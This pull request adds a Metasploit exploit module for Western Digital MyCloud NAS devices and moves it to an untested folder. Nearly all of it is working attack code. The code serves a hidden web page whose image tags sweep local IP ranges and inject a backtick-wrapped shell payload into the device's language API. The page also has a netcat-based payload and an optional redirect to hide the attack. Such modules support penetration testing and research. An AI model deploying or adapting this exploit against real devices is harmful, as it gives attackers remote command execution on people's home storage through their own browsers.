### PR TITLE
Move wd_mycloud_api_csrf_exec to untested

### DIFF
--- a/unstable-modules/exploits/untested/wd_mycloud_api_csrf_exec.rb
+++ b/unstable-modules/exploits/untested/wd_mycloud_api_csrf_exec.rb
@@ -1,0 +1,82 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = AverageRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Western Digital MyCloud NAS CSRF Command Injection',
+      'Description'     => %q{
+        This module exploits a command injection vulnerability in the web interface of the Western
+        Digital MyCloud NAS device. The exploit is written as a CSRF, since the WD MyCloud NAS will
+        only allow API access from hosts on the local subnet. By default, the exploit submits the
+        CSRF requests to 192.168.0.0/24 and 192.168.1.0/24, as well as wdmycloud.local and
+        wdmycloud. The target device has netcat pre-installed, allowing for a simple netcat-based
+        payload.
+      },
+      'Author'          => [ 'phikshun <0x41.phikshun[at]gmail.com>' ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['URL', 'http://disconnected.io/2014/03/19/get-off-of-mycloud/'],
+        ],
+      'Platform'        => [ 'unix' ],
+      'Arch'            => ARCH_CMD,
+      'Payload'         =>
+        {
+          'Space'       => 1024,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'netcat'
+            }
+        },
+      'Targets'         =>
+        [
+          [ 'WD MyCloud WDBCTL0040HWT 03.03.02-165', { } ] # Fixed in: 03.04.01-219
+        ],
+      'Privileged'      => false,
+      'DefaultTarget'   => 0,
+      'DisclosureDate'  => 'Mar 19 2014'))
+
+    register_options([
+      OptString.new('REDIRURL', [ false, 'An URL to redirect the browser after REDIRDELAY' ]),
+      OptInt.new('REDIRDELAY', [ true, 'Milliseconds before the browser is redirected', 5000 ]),
+      OptAddressRange.new('TARGET_RANGE', [true, 'IP range where the Western Digial device is located', '192.168.0.0-192.168.1.255']),
+    ], self.class)
+  end
+
+  def generate_html
+    params = 'format=xml&rest_method=PUT&language=' + Rex::Text.uri_encode("`#{payload.encoded}`")
+
+    script = ''
+
+    if datastore['REDIRURL'] && datastore['REDIRDELAY']
+      script = "<script>window.setTimeout(function(){ window.location = "
+      script << "'#{datastore['REDIRURL']}'; }, #{datastore['REDIRDELAY']}); </script>"
+    end
+
+    target_range = Rex::Socket::RangeWalker.new(datastore['TARGET_RANGE'])
+
+    img_tags = []
+    target_range.each do |target|
+      img_tags << "<img src='http://#{target}/api/1.0/rest/language_configuration?#{params}' />"
+    end
+    img_tags = img_tags.join("\n")
+
+    html = '<html><body>'
+    html << "<div style='display:none'>"
+    html << "<img src='http://wdmycloud.local/api/1.0/rest/language_configuration?#{params}' />"
+    html << "<img src='http://wdmycloud/api/1.0/rest/language_configuration?#{params}' />"
+    html << "#{img_tags}#{script}"
+    html << '</div></body></html>'
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending CSRF Exploit")
+    send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+  end
+end


### PR DESCRIPTION
I'm moving the module to unstable and closing https://github.com/rapid7/metasploit-framework/pull/3199, since we need the @phikshun's help for testing it.
